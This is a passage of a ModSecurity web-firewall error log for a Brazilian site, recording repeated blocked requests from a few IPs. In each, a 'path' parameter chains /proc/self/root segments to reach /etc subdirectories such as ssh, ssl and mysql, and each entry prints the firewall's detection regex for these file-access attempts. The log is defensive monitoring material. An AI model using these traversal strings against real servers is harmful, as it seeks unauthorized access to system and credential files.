[Mon Mar 16 13:12:27.343669 2026] [:error] [pid 32654:tid 140411649607424] [client 74.7.241.46:33228] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgr6wlT9VtDQc7bgUy2BQAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:12:42.058191 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.241.46:38516] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgr-tSswJuvopo3lOhhqQAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:12:46.125913 2026] [:error] [pid 15329:tid 140411616036608] [client 74.7.243.203:42498] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgr_h1q6tjNW06wcg32MgAAAw8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:12:47.410933 2026] [:error] [pid 10831:tid 140411582465792] [client 74.7.243.203:45800] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgr_46lpbStxTqkSktvBAAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:12:54.289921 2026] [:error] [pid 11972:tid 140411632822016] [client 74.7.243.203:45812] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgsBpqj1wV0Si-OkefwxgAAAA0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:13:55.639096 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.241.46:46216] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgsQ46lpbStxTqkSktvKAAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:14:06.402779 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.244.31:33598] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgsTtSswJuvopo3lOhh7QAAAIA"]
[Mon Mar 16 13:14:08.243254 2026] [:error] [pid 15329:tid 140411649607424] [client 74.7.241.46:44892] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgsUB1q6tjNW06wcg32RQAAAws"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 13:14:26.735875 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.243.203:56374] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgsYtSswJuvopo3lOhiBgAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:14:28.067015 2026] [:error] [pid 15061:tid 140411716749056] [client 74.7.243.203:57250] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgsZKTCbgAP5jq5TegslwAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:14:34.173520 2026] [:error] [pid 15568:tid 140411582465792] [client 74.7.243.203:57264] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgsaqQpVkWug9HeOt84ewAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:14:35.478384 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.243.203:50594] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgsa9SswJuvopo3lOhiCQAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:14:50.075403 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.241.46:40068] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgsepqj1wV0Si-OkefxLgAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:15:34.796011 2026] [:error] [pid 21533:tid 140411733534464] [client 74.7.243.203:50606] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgspnjZBu2q05ozVU9bggAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:15:38.428958 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.243.203:55622] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgsqo6lpbStxTqkSktvMgAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:15:40.191359 2026] [:error] [pid 11972:tid 140411616036608] [client 74.7.241.46:35436] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgsrJqj1wV0Si-OkefxgQAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:15:40.866675 2026] [:error] [pid 15568:tid 140411666392832] [client 74.7.243.203:55636] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgsrKQpVkWug9HeOt84ggAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 13:16:21.219245 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.243.203:40150] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgs1f9ocpUE4ed4uDzx5AAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:16:28.015206 2026] [:error] [pid 32654:tid 140411557287680] [client 74.7.243.203:45082] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgs3AlT9VtDQc7bgUy2fwAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 13:16:51.958082 2026] [:error] [pid 15061:tid 140411616036608] [client 74.7.243.203:45084] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgs86TCbgAP5jq5Tegs4QAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:17:58.565426 2026] [:error] [pid 15061:tid 140411733534464] [client 74.7.243.203:53670] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgtNqTCbgAP5jq5TegtSwAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:18:03.264038 2026] [:error] [pid 15061:tid 140411574073088] [client 74.7.243.203:42016] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgtO6TCbgAP5jq5TegtUgAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:18:05.603411 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.243.203:49574] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag 